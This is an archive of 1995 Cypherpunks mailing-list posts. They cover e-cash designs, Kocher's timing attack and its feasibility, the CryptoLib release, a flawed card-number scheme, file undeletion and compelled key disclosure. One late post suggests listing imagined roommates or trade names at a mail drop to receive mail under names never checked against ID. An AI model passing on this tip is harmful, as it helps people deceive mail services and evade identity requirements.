13-DEC-1995 03:44:41.99 >If we stick to a lesser goal -- constancy of identity -- this is not so hard. In general it is impossible to prove that Bryce is the "real" Bryce, but it is trivial to prove that Bryce is the same Bryce who has a certain Web page, and the same Bryce who posted a certain article in archives. ----------------- I have been considering all the pieces of information that ought to be automatically linkable to a particular public key. They include: 1. Email address(es) from which mail signed with it is customarily received, to save on lookup time. 2. Web pages put up by this person. 3. Web pages/ftp files/etcetera authored by this person (i.e., the hks archives of cypherpunks). 4. Phone number if using a crypto-capable phone with a key-download capacity from a computer. 5. A declared name or alias. 6. In my files, whatever name I want to give the person. Ultimately, if I receive something signed by somebody, I would want to have hypertext links from that file to all of these- to remind me of whom I'm talking to and his/her/its/their past behavior. -Allen From asgaard at sos.sll.se Wed Dec 13 14:33:35 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Thu, 14 Dec 1995 06:33:35 +0800 Subject: PGP status in russia In-Reply-To: Message-ID: On Sun, 10 Dec 1995, JustMe wrote: > does anybody know the legal status > of using encrypted email in russia? Probably forbidden without a government license. See: http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm Mats From dklur at dttus.com Wed Dec 13 14:39:10 1995 From: dklur at dttus.com (David Klur) Date: Thu, 14 Dec 1995 06:39:10 +0800 Subject: e-Cash: CAFE vs. Mondex Message-ID: <9511138188.AA818893347@cc2.dttus.com> >Matthias Schunter Said [snip] >The CAFE system is a cheque based system. This means that the >customer receives an electronic chequebook, where each cheque is >(blindly) signed by the bank. >During each payment the customer has >to use one of these signed cheques. [snip] If the CAFE card contains cheques (which are not digital cash, and therefore must be tied back to a customer's checking account), how can the bank blindly sign them? The merchant will have to deposit the cheque in order to transfer the money out of the customer's account and into the merchant's account. I don't see how the bank can not know the identity of the customer. This is why digital cash can be anonymous - because once the bank (blindly) signs the cash tokens, these tokens ARE money. They are not pointers (in the case of cheques) to customers' bank accounts. However, if Alice (the customer) contacts her bank and requests a cheque be made out to Bob (the vendor) for, say, $12.50 then the bank can withdraw $12.50 from Alice's account and blindly sign a cheque for $12.50 payable only to Bob. Then the bank would not know Alice's identity. I don't think this is how CAFE works, since CAFE is designed as an off-line smart card system. Therefore, Alice cannot requests bank cheques from her bank made payable to Bob when she walks into Bob's store. Maybe your definition of a cheque is different than mine? ______________________________ Reply Separator _________________________________ From alano at teleport.com Wed Dec 13 14:41:35 1995 From: alano at teleport.com (Alan Olsen) Date: Thu, 14 Dec 1995 06:41:35 +0800 Subject: Spotty c'punks service due to network outages Message-ID: <2.2b7.32.19951213200827.008e63dc@mail.teleport.com> At 02:35 PM 12/12/95 -0800, you wrote: >Our network service is going up and down, probably due to the storms >in San Francisco. If you see delays, that's the reason why. As far >as I know, NSA has not figured out how to control the weather, so it's >not their fault :-). This is not just in San Francisco... Portland, OR has been having some pretty bad problems with power outages. (My ISP was offline all last night.) I expect that Seattle will be having similar problems due to the storm front that just went through. As for the NSA controlling the Weather Orginization... That only counts as a successfull attack if they have the Evil Geniuses for a Better Tommorrow assisting in the attack. (And they are controlled by at least one computer group.) Sorry... Been catching up on my mail from the Illuminati mailing list. | Remember: Life is not always champagne. Sometimes it is REAL pain. | |"It's only half a keyserver. I had to split the | Disclaimer: | |other half with the government man." - R. Rococo | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | alano at teleport.com | From sameer at c2.org Wed Dec 13 15:28:02 1995 From: sameer at c2.org (sameer) Date: Thu, 14 Dec 1995 07:28:02 +0800 Subject: More FUD from First Virtual [NOISE] In-Reply-To: <199512120654.WAA17948@ix12.ix.netcom.com> Message-ID: <199512120743.XAA24011@infinity.c2.org> > > Besides, if you hack FV you've got the money :-) Uh, no you don't. I can't think of any ways you could hack FV and actually make money at it, because in the end the credit card would just get a chargeback. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From EALLENSMITH at ocelot.Rutgers.EDU Wed Dec 13 15:30:23 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Thu, 14 Dec 1995 07:30:23 +0800 Subject: e-mail forwarding, for-pay remailers Message-ID: <01HYRJSUSFLS8Y4Z3G@mbcl.rutgers.edu> From: IN%"gbroiles at darkwing.uoregon.edu" "Greg Broiles" 13-DEC-1995 03:40:50.49 >I don't have much faith that the people who are currently doing the DNS for my domain name (goldenbear.com) are going to do anything about the current bouncing-messages phenomenon anytime soon, so I'm looking into other ways to get & send E-mail (e.g., more persistent than this address which will disappear when I'm done with school in ~ 6 months). I've found a few services which may be of interest to C-punks because they're useful for creating/maintaining persistent cyberspace identities with no necessary connection to a "real name". [...] netbox.com ( http://www.netbox.com ) provides web pages and E-mail storage or forwarding for people; they let you sign up for a trial month for free. They ask for name/address/phone (which could easily be a Mailboxes Etc address and a voicemail from Mailboxes Etc or whatever) and accept payment by check or credit card. They'll store incoming email or forward it to another account. They'll do header rewriting (similar to the anonymous remailers) so that outgoing mail looks like it came from this address. -------------------- There's one problem with this in regards to the "no necessary connection," and that 's the governmental requirement for mail forwarding. MBE and any legal other one will want to see at least two forms of ID including one photo, and have a form that they fill out using that and send to the local post office. Anyone have a way around this problem? -Allen From jimbell at pacifier.com Wed Dec 13 16:16:31 1995 From: jimbell at pacifier.com (jim bell) Date: Thu, 14 Dec 1995 08:16:31 +0800 Subject: Blinding against Kocher's timing attacks Message-ID: At 01:27 PM 12/12/95 -0800, you wrote: >From: ljo at ausys.se (Johansson Lars) >> Does anyone know whether David Chaum's patent on >> blind digital signatures extends to this application? > >I don't think it would. Chaum's blinding protocol has one major >difference: the blinding factor is applied by a different person than >the one doing the signing. The purpose of the blinding is different, >too; in Chaum's case the idea is to end up with a signature which is >unknown to the signer, while with Kocher's "defensive blinding" the >signature (or decryption) is an ordinary RSA one, and the blinding is >just done internally by the signer to randomize the timing. One thing I haven't heard mentioned would be the possibility of using TWO blinding factors, by two different people, to blind the unsigned cash. As you may know, I'm interested in payee-anonymous systems as well as payer-anonymous ones, and such a feature might assist in this. From wilcoxb at nagina.cs.colorado.edu Wed Dec 13 16:18:11 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce) Date: Thu, 14 Dec 1995 08:18:11 +0800 Subject: PGP/PINE integration In-Reply-To: Message-ID: <199512132126.OAA17578@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- Robert Hayden > > For those that dont' need quite this much or don't have access to pine at > the install level (often for university systems with a central software > depository), I have a script called PineSign available on my home page > (or email me) that will allow simple PGP singing of your pine mailings > and postings. I doesn't do encryption, but works great for signatures. And my "Bryce's Easy PGP" script, whose creation was inspired by Mr. Hayden's PineSign, does both encryption and signing, and supports decryption (ugly but usable with Pine). BAP is an sh script, so it useful with many Unix message utilities. I myself use it for all my messages with mh and trn. You can buy BAP for 2 US $, payable in Mark Twain Ecash, at my WWW site, the Niche , or if you are one of those backwards blokes who doesn't have Ecash yet, e-mail me and I'll give you a complimentary copy. Regards, Bryce signatures follow "To strive, to seek, to find and not to yield." -Tennyson bryce at colorado.edu -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01 iQCVAwUBMM9E7/WZSllhfG25AQHjygP6A0vl0CJyxE8gtEJSH/akRYDyoStCiic4 adZPJTi43bZ0NoZdzYWzNWq3+cJzyvzUIjnj8AynohET61w6czO7ItRtDRuUPuKG fJEoZh8U65UyZwcIISTVAg10yxoEnF6BjkP9dUGshe/XMt1ydEtgEwj/l2DciZ+K v6ibPETpfbg= =VygP -----END PGP SIGNATURE----- From jim at bilbo.suite.com Wed Dec 13 16:19:42 1995 From: jim at bilbo.suite.com (Jim Miller) Date: Thu, 14 Dec 1995 08:19:42 +0800 Subject: Attacking Clipper with timing info? Message-ID: <9512132111.AA18490@bilbo.suite.com> Could this timing attack be used to obtain the various keys used by Clipper devices? Jim_Miller at suite.com From llurch at networking.stanford.edu Wed Dec 13 16:22:03 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Thu, 14 Dec 1995 08:22:03 +0800 Subject: [NOISE] Re: And the standard continues to lower... In-Reply-To: <199512132152.QAA23054@bb.hks.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 13 Dec 1995, The user formerly known as Leslie Todd Masco wrote: > If the misuse of "One Time Pad" wasn't enough for ya, check out this ad that > I was e-mailed. > > And the chair of a CS department, no less. I don't believe you'll find that particular college in US News & World Report. > - ------- start of forwarded message (RFC 934 encapsulation) ------- > Subject: Secure No-overhead Online Order System for Publishers > Date: Wed, 13 Dec 1995 12:24:03 -0800 (PST) > > A secure no-overhead online title-ordering system is now available. It may > be viewed in operation at the home page for Blue Water Publishing, a > publisher, software developer and distribution company, at > http://www.bluewaterp.com/~bcrissey/ > or from the online bookstore area of ISCNI, the Institute for the Study of > Contact with Non-Human Intelligence at > http://www.iscni.com "Beam me up, Scotty. There's no intelligent life down here." - -rich -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMM9dmo3DXUbM57SdAQEU5gQAtaJJJ9975vln12JWkCHviXXOC6xIGJo0 gxPeTRha4i7e++G7VrZ9Z2QM2QRIhEDj4c2vBMbCNdCwfyGGmpV/+ykqVMMfppEk B2doHMizkGLju0gSobE4MOvNQyO6jLavJnpee/QgR7eaHs6iVb7yzhYqcOfRmLeo BlYK0ACngT0= =oC/C -----END PGP SIGNATURE----- From francis at e-mail.com Wed Dec 13 18:30:58 1995 From: francis at e-mail.com (Francisco Encarnacao) Date: Thu, 14 Dec 1995 10:30:58 +0800 Subject: (U) Message-ID: <9512132200.AA13025@toad.com> SUBSCRIBRE Regards, Francisco Encarnacao - Equipment Maintenance Technician Internet E-mail address:Francis at e-mail.com From markm at omni.voicenet.com Wed Dec 13 18:33:36 1995 From: markm at omni.voicenet.com (Mark M.) Date: Thu, 14 Dec 1995 10:33:36 +0800 Subject: Attacking Clipper with timing info? In-Reply-To: <9512132111.AA18490@bilbo.suite.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 13 Dec 1995, Jim Miller wrote: > > Could this timing attack be used to obtain the various keys used by > Clipper devices? > > Jim_Miller at suite.com > > The Clipper chip itself does not use digital signatures and public key encryption. It only implements an block cypher. You were probably talking about Capstone which does use PK crytpo and digital signatures. Capstone uses DSS as the digital signature which is explicitly pointed out in the summary of the timing attack. I don't think what algorithm it uses for key exchange has been releases yet, but it probably is vulnerable. So Capstone is indeed vulnerable to timing attacks. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMM9n1bZc+sv5siulAQFiogP/ZoGwK/gJpEyGhfQhHx8MM9pA/BPO36ZK C/lFiOn1DhisqV+o2uYz8noRInr76fhO2drxCzACq1hCt3EAq9rXTmTDZeQOxHQS 6nT8VE5GJH54TwbTn5yeG2w7FUUDFeOYyu/aGQTIztAaUwJ3vLJSnP6ze50BTXI9 JJeziR8yBqE= =b6p3 -----END PGP SIGNATURE----- finger markm at voicenet.com for Public Key http://www.voicenet.com/~markm/ Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5 -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+ b+++ DI+ D++ G+++ e! h* r! y? ------END GEEK CODE BLOCK------ From mab at research.att.com Wed Dec 13 18:59:02 1995 From: mab at research.att.com (Matt Blaze) Date: Thu, 14 Dec 1995 10:59:02 +0800 Subject: CryptoLib 1.0 now available Message-ID: <199512140032.TAA27224@nsa.tempo.att.com> [Note! This is posted for Jack Lacy; please direct responses to him at cryptolib at research.att.com. -matt] Announcing CryptoLib - Release 1.0 12/13/95 Jack Lacy, AT&T Bell Labs CryptoLib is a portable and efficient library of primitives for building cryptographic applications. It runs under most versions of Unix as well as DOS, Windows and Windows-NT (and 95). We are pleased to make CryptoLib source code available without charge to researchers and developers in the US and Canada. (Because of export restrictions on cryptographic software, we are only able to make the software available within the US and Canada to US and Canadian citizens and US permanent residents.) CryptoLib is intended for research and experimental use, and is distributed without warranty or support. In particular, please note the following license conditions: * Copyright (c) 1995 by AT&T. * Permission to use, copy, and modify this software without fee * is hereby granted, provided that this entire notice is included in * all copies of any software which is or includes a copy or * modification of this software and in all copies of the supporting * documentation for such software. * * This software may be subject to export controls. * * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED * WARRANTY. IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE. The attached describes the library and some timing results. To obtain source code send electronic mail to: cryptolib at research.att.com with a statement of the following form: "I am a U.S. or Canadian citizen or a legal permanent resident of the U.S. and am aware that some parts of CryptoLib may be restricted under United States export regulations. I have read and understand the CryptoLib license." Name: Location: E-mail: Are you licensed to use the RSA patent? If yes, give name of licensed organization: =============================================================================== CryptoLib includes the following: arbitrary length bignums. bigmath package: bigAdd, bigSubtract, bigMultiply, bgiDivide, bigLeftShift, bigRightShift, bigAnd, bigOr, bigXor, bigCopy, Euclid's extended GCD, modular reduction and exponentiation crypto primitives DES and 3DES + modes Diffie-Hellman DSA (Signing and verification roughly equally efficient) El Gamal Rabin's scheme Random Number generation (PSEUDO and TRUE) MD[2,4,5] Prime generation RSA (provided only if you convince me that you have a license) SHA truerand (For Unix, NT and 95) quantization (Defense against Kocher's timing attack) quantized RSA, DSA and El Gamal private key operations. support functions asn1.c ioutils.c netIface.c Some timing information: All times assume 32X32 bit assembly of multiplication primitives. bigPow times (a^b mod c with a,b,c the same length) 512 bits 1024 bits -------- --------- bigPow 0.12s 0.72s Sparc II Brickell bigpow 0.43s 3.0s Sparc II with asm (gcc) 0.12s 0.78s Sparc 10 with asm 0.03s 0.17s Sparc 10 with asm (Brickell) 0.084s 0.45s SGI Indigo (150MHz) 0.109s 0.75s 100 MHz Pentium (gcc under DOS) Strong Prime Generation -- ProbTestAttempts = 5 100 primes generated in each test. Times below are: (total test time)/100 = avg. time per prime generated. Using Gordon's strong prime algorithm. 256 512 1024 Machine --- --- ---- ------- 2.8s 24.0s 5.11m Sparc II .45s 2.7s 77s 100 MHz pentium RSA Times (64 bit public exponent, message encrypted is full length) --------- 512 768 1024 bits machine --- --- --------- ------- encrypt 30ms 50ms 80ms sparc II decrypt 160ms 480ms 930ms encrypt 15ms 33ms 56ms 100 MHz Pentium (Under NT) decrypt 38ms 104ms 214ms DSA Times --------- 512 768 1024 bits machine --- --- --------- ------- sign 99ms 166ms 216ms sparc II (Brickell speedup) verify 156ms 316ms 416ms sign 21ms 38ms 49ms 100 MHz Pentium (Under NT) verify 27ms 43ms 71ms From nobody at REPLAY.COM Wed Dec 13 19:00:15 1995 From: nobody at REPLAY.COM (Anonymous) Date: Thu, 14 Dec 1995 11:00:15 +0800 Subject: And the standard continues to lower... Message-ID: <199512140038.BAA02939@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- >If the misuse of "One Time Pad" wasn't enough for ya, check out this ad that >I was e-mailed. > >And the chair of a CS department, no less. > >- ------- start of forwarded message (RFC 934 encapsulation) ------- >Subject: Secure No-overhead Online Order System for Publishers >Date: Wed, 13 Dec 1995 12:24:03 -0800 (PST) > >A secure no-overhead online title-ordering system is now available. It may >be viewed in operation at the home page for Blue Water Publishing, a >publisher, software developer and distribution company, at >http://www.bluewaterp.com/~bcrissey/ >or from the online bookstore area of ISCNI, the Institute for the Study of >Contact with Non-Human Intelligence at >http://www.iscni.com > >Blue Water's innovative online ordering system is called SimplySafe. It is >a needle-in-the-haystack approach to online security. It requires no >encryption or secure servers, yet the probability that a dedicated hacker >scanning 100 internet messages a second will intercept a usable credit >card number sent via SimplySafe is less than the probability of picking >our Sun out of the Milky Way. That is less than 1 in 200 billion. Safe >enough for most folks. There are easier ways for a hacker to pick up >credit card numbers than to waste time with SimplySafe transactions. Try >it out! > >SimplySafe currently supports secure online orders from Blue Water >Publishing, Wild Flower Press, Swan-Raven & Co., and ISCNI. >Direct inquiries to >SimpleSafe at aol.com > >***Dr. Brian L. Crissey, Chair CS Dpt, Linfield Col., McMinnville, OR 97128 >(503)-434-2426 brianc at linfield.edu >Professionals built the Titanic, amateurs built the Ark... The scheme is to send 4 digits of the credit card at a time. The "explanation" follows. >In order to proceed with your SimplySafe� encryption of your credit card >number, please enter the SECOND set of (4) digits of your credit card number: > >In the 41 seconds since you sent your first packet of four digits, >approximately 2869959 packets of information have passed across the internet. >Assuming that a hacker can scan 100 packets of information per second for >credit card information, there is 1 chance in 699 that he has scanned your >first packet of digits. >He is unlikely to have found anything useful. Sigh. Wilhelm Busch -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMM9w94iUi5SQtQ3tAQENnAf6A2SdN+AZGryzJ/eCE/fj+YO71ngQXk8A 2tAomwUqAPmrCll+ucnDc/knsct2VYo4I9b+j84Ah+Gzz6rAu3LKY+joBrgDBmBY j79BOxik6tz9GCdBYDxTQ1BJpwbDAxaQHpNJYgEFryB59yxo4gi9xZbKZnnQv571 uQfuk1rAJbI+ESJK1Wlw8YrT+q8PoW8m5Y1qjBhxczRNaYAENsrVqHsz8L8bEBkW WEfi6wIQpRkB6Fo9hH2HAVamvUwJvDtPgll6U1zBgh/zEs1Jyot3XLV5UHrdL7oM 6FRPD1LW/cWGjUv2YNyv6a3vDFz9LdcCk9eX+gekODzaE+fgeQWI3g== =2n1S -----END PGP SIGNATURE----- From cactus at hks.net Wed Dec 13 20:15:29 1995 From: cactus at hks.net (The user formerly known as Leslie Todd Masco) Date: Thu, 14 Dec 1995 12:15:29 +0800 Subject: IDEA encryption Message-ID: <199512132337.SAA24071@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , Mark M. wrote: >> Last thing -- how secure is unix "rm"? If something is rm'd, is it >> really really gone? >> > >Not very secure. I have heard that there is a Linux undelete and there might >be a similar program for other Unices. If the hard drive is examined using >special hardware, data will be recoverable. It's not even that secure. As long as the blocks haven't been written over, you can extract the information from the raw device driver with 'dd' as root. - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMM9juyoZzwIn1bdtAQFXZAGA4HlzYVD4ORp5LecGxw16q+ELXZFChIuA kSHufPYuGQjsVDuQ0Ev4Xkroc3kVfZTQ =1vxa -----END PGP SIGNATURE----- From andrew_loewenstern at il.us.swissbank.com Wed Dec 13 20:17:17 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Thu, 14 Dec 1995 12:17:17 +0800 Subject: And the standard continues to lower... Message-ID: <9512132317.AA01174@ch1d157nwk> Dr. Brian L. Crissey includes in his .sig, courtesy of cactus at hks.net [ much WRT YetAnotherSecureInternetCreditCardPaymentSystem(*tm) deleted ] > ***Dr. Brian L. Crissey, Chair CS Dpt, Linfield Col., McMinnville, OR 97128 > (503)-434-2426 brianc at linfield.edu > Professionals built the Titanic, amateurs built the Ark... However, the Ark was *designed* by GOD (if you believe the story). Can Dr. Brian L. Crissey say the same thing about his payment system? andrew From gibo at ripco.com Wed Dec 13 20:49:50 1995 From: gibo at ripco.com (Giles Bowkett) Date: Thu, 14 Dec 1995 12:49:50 +0800 Subject: Timing Attack Paper Message-ID: I went to http://www.cryptography.com/timingattack.html and found the whole thing to be totally incomprehensible from a layman's point of view. I apologize for having not read "Applied Cryptography", which might have made the abstract a simpler read - but even if I had I'd have been baffled by a lot of the terminology and equations in this paper. Can anyone post a brief summary which explains the essential workings of the attack? I'd be very grateful. --giles ===========================>>>http://pages.ripco.com/~gibo as long as I shall stay alive I never want a nine to five -----BEGIN PBP SIGNATURE----- Version: 1.0.0, Copyright 1995, Pretty Bad Privacy Giles Bowkett gibo at ripco.com I am who I am because I say so. So there. -----END PBP SIGNATURE------- From rittle at comm.mot.com Wed Dec 13 20:50:13 1995 From: rittle at comm.mot.com (Loren James Rittle) Date: Thu, 14 Dec 1995 12:50:13 +0800 Subject: Attacking Clipper with timing info? In-Reply-To: <9512132111.AA18490@bilbo.suite.com> Message-ID: <9512140210.AA12418@supra.comm.mot.com> -----BEGIN PGP SIGNED MESSAGE----- >From: jim at bilbo.suite.com (Jim Miller) >Date: Wed, 13 Dec 95 15:10:25 -0600 >Could this timing attack be used to obtain the various keys used by >Clipper devices? Jim, Without having the details of the algorithm, I suspect the answer is 'remotely possible, at best'. However, to extend what I suspect you were getting at: It would be very interesting to determine if the NSA knew about this crypto-design problem and put effort into making Clipper chips resistant to this timing based attack. Without access to internal documents, I suspect this would be hard to determine. We could learn something about the NSA by studying the Clipper chip (or the follow-on PCMCIA product containing SKIPJACK, Capstone). If it could be shown that Clipper chips require a different amount of time/current to encode/decode traffic, then we could conclude one of the following: (A1) The NSA knew about the problem, expected to be able to use the behavior as an illegal backdoor and thus did nothing to close it. (A2) The NSA knew about the problem, expected that no one (including themselves) would be able to exploit the behavior, and thus did nothing to close it. (A3) The NSA didn't know about the problem. Conclusions A1 and A3 would tend to make the NSA look bad. A2 would be fine, if the NSA expectation was found to be valid. To restate, without internal documents, outsiders would have little ability to determine which conclusion to draw even if differences in behavior were detected. If it could be shown that Clipper chips require a fixed amount of time/current to encode/decode traffic, then we could conclude one of the following: (B1) The NSA knew about the issue and compensated for it. (B2) The NSA didn't know about the issue and got lucky. I discount B2 as a valid option. Actually, if the answer was B1, my respect for the NSA would creep up a notch. :-) Regards, Loren - -- Loren J. Rittle (rittle at comm.mot.com) PGP KeyIDs: 1024/B98B3249 2048/ADCE34A5 Systems Technology Research (IL02/2240) FP1024:6810D8AB3029874DD7065BC52067EAFD Motorola, Inc. FP2048:FDC0292446937F2A240BC07D42763672 (708) 576-7794 Call for verification of fingerprints. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMM+HTf8de8m5izJJAQGWJwP8CUJIagN5cyZhRc9Qxq4+u4d/1H7wfAzi OKa+m4XlfEsCKxF9x6vnYXcC2jGKpU43RbCVsLN/FLJjptWuBczXzPMdS1Uu0nPU yVWse7eVx0Jl0dbTpUxm0Z966G4cwmnX0Npq6BnVFlp7mNFJGZv157K17vsHwvYB apf4IwtPqdI= =CDP6 -----END PGP SIGNATURE----- From gnu at toad.com Wed Dec 13 20:50:39 1995 From: gnu at toad.com (John Gilmore) Date: Thu, 14 Dec 1995 12:50:39 +0800 Subject: Mike Godwin Re: Is there a lawyer in the house? Message-ID: <9512120257.AA14501@toad.com> From: Mike Godwin Subject: Re: [Black Unicorn: Re: Is there a lawyer in the house?] Date: Mon, 11 Dec 1995 13:27:34 -0800 (PST) > The question is whether the government can legally compel production > of your encryption key(s) if you give them to another person, such as > an escrow agent of your choice, your lawyer, your wife, your bank, > your web site provider, or whoever. Compelling the key from the person you gave it to is easy. (That is, the answer there is yes, assuming no independent claim of non-Fifth Amendment-derived privilege.) Whether you have given it to another person does not automatically make it easier to compel the key from you. But under certain circumstances (and in certain jurisdictions) it might -- such as if, for example, you were relying on a "last link" rule to bar your disclosure of the key. If you were arguing that the disclosure of the key would be a "last link" in a chain of inculpatory causation, and it could be shown independently that you had already disclosed the key to someone else, thereby proving that you possessed the key at one time, your having done so might undermine your "last link" argument. Feel free to forward this. --Mike From mdiehl at dttus.com Wed Dec 13 20:50:44 1995 From: mdiehl at dttus.com (Martin Diehl) Date: Thu, 14 Dec 1995 12:50:44 +0800 Subject: Timing Cryptanalysis Attack Message-ID: <9511118187.AA818747282@cc2.dttus.com> OTOH, maybe we _should_ try for constant computation time and then try for *random* delay time. Remember that _we_ will spend a lot of real time arguing whether the *random* delay is really _random_ Martin G. Diehl _______________________ Reply Separator __________________________ Subject: Re: Timing Cryptanalysis Attack Author: Nathaniel Borenstein at Internet-usa Date: 12/11/95 2:41 PM Hey, don't go for constant time, that's too hard to get perfect. Add a *random* delay. This particular crypto-flaw is pretty easy to fix. (See, I'm not *always* arguing the downside of cryptography!) It is worth noting, however, the extent to which "secure" cryptographic protocols keep needing to get fixed one last time.... -- Nathaniel -------- Nathaniel Borenstein | (Tense Hot Alien In Barn) Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON: FAQ & PGP key: nsb+faq at nsb.fv.com | http://www.netresponse.com/zldf From fc at all.net Wed Dec 13 20:50:52 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Thu, 14 Dec 1995 12:50:52 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512112111.NAA02653@mage.qualcomm.com> Message-ID: <9512120054.AA05216@all.net> The timing of cryptosystems to get keys is a special case of covert channels, and it is not correct to claim that trusted systems (ala the TCSEC) fail to account for this. The problem with covert channels (including timing channels such as the one that gets key material) runs pretty deep. For example, Shannon's theory says that for any finite amount of noise, we can always send information through such a channel at a bandwidth dictated by the signal to noise ratio. Furthermore, any time a computational resource with known characteristics is shared in a way that depends on a secret in any way, that secret is leaked through the covert channel associated with the shared resource. So the difference between processing a one and a zero even in many forms of multiplication can be used to determine characteristics of many secret processes. Example: a valid password results in a different execution time than an invalid one -> enough statistics, and you can find the password. Example: a valid UID with an invalid password takes a different amount of time than a valid UID with the same password -> enough statistics and you can find valid UIDs. Example: a transaction worth $1,000 takes a different amount of processing time than a transaction for $2.95 -> enough statistics and you can figure out which messages are worth breaking. Example: usage characteristics change just before major stock changes occur -> enough statistics and you can predict when the share price will change dramatically. If you are willing to spend enough effort charactierizing these things, no system with information-dependent shared resources (e.g., the Internet) can hold its secrets (a bit of poetic license there). -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From droelke at rdxsunhost.aud.alcatel.com Wed Dec 13 20:51:43 1995 From: droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke) Date: Thu, 14 Dec 1995 12:51:43 +0800 Subject: Timing Attacks Message-ID: <9512120216.AA03191@spirit.aud.alcatel.com> > From: "Rev. Ben" > > I'm not so sure I see the great usefulness of this attack. > > I've taken a cursory glance at Mr. Kocher's paper on-line and what it > comes down to essentially, if I undestand it correctly, is that you need > to be as sure of the timing as you can be. > > Now, on a distributed system, you can't measure those timings, because > any latency could come from the originating computer, the links in the > middle or any combination of them. But, what if one of the computers is connected on a "hostile" lan. For example - your typical student PC running in a grad-student office or on the network in the dorms. Sniffing packets from it shouldn't be too hard (yes, good ethernet concentrators make it harder - but not impossible). These packets will give you the necessary timing information. > Also precise timings can be limited by fluctuating load averages amongst > other things in a time-sharing computing environment. While this might > work in a lab, with the current advances in computing speed, the > differences between a fast and a slow calculation can easily be opaqued > by network lag. > > Am I missing something, or does this attack only work in a lab? What if that is a PC running Windoze or single-user Linux? Then there aren't likely to be fluctuating load averages. The advesary is close to the one end, and away you go...... Of course, targeting a server is much more pratical in terms of what you may gain access to. Several congested network hops will generate lots of delays, BUT what about the 4:00am hit from the dialup terminal servers that happen to be on the same ethernet as the secure server. This would be a normal situation for many ISPs. All of that said - I think that this is more pratical in the "lab" than on the net. But, it is a very clever approach to the problem of cracking a crypto system. It serves us all a good example that we need to leave NO stone unturned when examining a system. Dan ------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX From gbroiles at darkwing.uoregon.edu Wed Dec 13 21:39:15 1995 From: gbroiles at darkwing.uoregon.edu (Greg Broiles) Date: Thu, 14 Dec 1995 13:39:15 +0800 Subject: e-mail forwarding, for-pay remailers Message-ID: <199512140317.TAA06107@darkwing.uoregon.edu> E. Allen Smith writes (quoting me): >>netbox.com ( http://www.netbox.com ) provides web pages and E-mail storage >>or forwarding for people; they let you sign up for a trial month for free. >>They ask for name/address/phone (which could easily be a Mailboxes Etc >>address and a voicemail from Mailboxes Etc or whatever) and accept payment >>by check or credit card. >-------------------- > There's one problem with this in regards to the "no necessary >connection," and that 's the governmental requirement for mail forwarding. >MBE and any legal other one will want to see at least two forms of ID >including one photo, and have a form that they fill out using that and >send to the local post office. Anyone have a way around this problem? I spent last summer in San Diego - it took me a couple of weeks to find a place to stay. The first day I was in town I went to an MBE and signed up for a box - showed them my Oregon ID and said "I don't have a local phone # or address because I've been in town only 12 hours. That's what I need you folks for." They cheerfully wrote down the information from the front of my drivers' license (which is 5 years out of date) and gave me a box. They also asked if there would be anyone else who'd be getting mail at my box - I could have specified a business or some roommates. They didn't need to see ID for those - so you're free to name some real or imagined roommates/friends, who might coincidentally sign up for E-mail forwarding. (Or you can just say that "Greg is my real name but John Doe is my trade name, I get mail under that name too." "Trade names" aren't so unusual for people in show business or authors or, I read recently, bill collectors. Apparently they don't want people calling them up at home hassling them. Imagine that. :) ) The folks at the San Diego MBE have been cheerfully forwarding my paper mail back here to Oregon as long as I want to keep paying the postage (plus some sum that they're adding on that's not big enough to pay attention to). It's not the kind of untraceability I'd rely on vis-a-vis a TLA, but it ought to be good enough to keep your posts to alt.sex.forbidden from showing up on your boss' desk via DejaNews, or to allow you to go ahead and piss off part-time fascists who don't have the energy to chase down the paper trail. -- "The anchored mind screwed into me by the psycho- Greg Broiles lubricious thrust of heaven is the one that thinks every temptation, every desire, every inhibition." greg at goldenbear.com -- Antonin Artaud gbroiles at darkwing.uoregon.edu From herbs at connobj.com Wed Dec 13 